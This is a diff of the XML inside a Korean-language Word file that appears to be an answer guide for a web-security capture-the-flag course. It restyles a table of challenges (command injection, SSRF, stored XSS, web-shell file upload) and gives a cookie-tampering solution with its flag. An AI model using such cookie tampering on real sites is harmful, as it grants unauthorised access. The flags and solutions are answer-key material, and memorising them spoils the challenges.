-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>중급</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>중상급</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>325</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>340</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG{cDgkb2FfdDE5MV9ycjQ}</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>직접 출력 없이 참/거짓 반응으로 자동화 추출이 필요해 상향.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -494,61 +920,121 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>7</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>네트워크 진단</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>Command Injection</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>중상급</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>350</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG{ops_ping_command_injection}</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>명령 구분자와 서버 파일 경로 이해가 필요해 유지.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -556,61 +1042,121 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>8</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>관리관 메모 연쇄</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>내부 보급망 점검기</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>Stored XSS</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>SSRF</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>고급</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>중상급</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>400</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>375</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG{stored_xss_admin_memo_chain}</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>localhost 기준 차이를 이해해야 하므로 유지.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -618,61 +1164,121 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>9</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>내부 보급망 점검기</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>관리관 메모 연쇄</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>SSRF</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Stored XSS</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>중상급</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>고급</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>375</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>400</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG{ssrf_internal_supply_route}</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>저장형 XSS와 관리관 API 연계가 필요해 유지.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -680,70 +1286,135 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>10</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전송 파일 업로드</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>File Upload</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>고급</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>450</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG{dispatch_upload_php_execution}</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>웹셸 업로드와 서버 실행 맥락이 필요해 최고 난이도 유지.</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
+      <w:pPr>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -757,30 +1428,51 @@
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4896"/>
+        <w:gridCol w:w="4896"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제 ID</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>session-shadow</w:t>
             </w:r>
           </w:p>
@@ -789,21 +1481,41 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>분류/난이도</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>분류 / 난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>쿠키 변조 / 초급</w:t>
             </w:r>
           </w:p>
@@ -812,21 +1524,41 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>150</w:t>
             </w:r>
           </w:p>
@@ -835,27 +1567,60 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>목표</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>출입 판정에 사용되는 쿠키 값을 확인하고 상위 권한으로 변경한다.</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG{cookie_role_admin_shadow}</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>목표</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>shadow_role 쿠키를 admin으로 바꿔 출입 판정을 통과한다.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -867,33 +1632,37 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>문제 페이지에 접속해 현재 출입 판정이 limited인지 확인한다.</w:t>
+        <w:t>문제 페이지에서 현재 출입 판정이 limited인지 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>개발자 도구의 Application/Storage 또는 브라우저 쿠키 목록에서 shadow_role 쿠키를 찾는다.</w:t>
+        <w:t>개발자 도구의 Application 또는 Storage에서 shadow_role 쿠키를 찾는다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>shadow_role 값을 guest에서 admin으로 변경한다.</w:t>
+        <w:t>쿠키 값을 admin으로 바꾸고 새로고침한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>페이지를 새로고침하면 granted 상태와 인증 표식이 표시된다.</w:t>
+        <w:t>granted 상태와 FLAG를 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -901,17 +1670,18 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>핵심 페이로드</w:t>
+        <w:t>핵심 입력</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:spacing w:before="80" w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="216"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
+          <w:color w:val="212D18"/>
           <w:sz w:val="18"/>
         </w:rPr>
         <w:t>document.cookie = "shadow_role=admin; path=/"</w:t>
@@ -922,64 +1692,82 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>정답</w:t>
+        <w:t>핵심 포인트</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>서버가 쿠키 값을 검증 없이 신뢰한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>FLAG{cookie_role_admin_shadow}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>메모: 서버가 쿠키 값을 서명이나 세션 검증 없이 그대로 신뢰하는 취약점이다.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>2. 비문 공지 검색소</w:t>
+        <w:t>2. 반사 게시판 검색</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
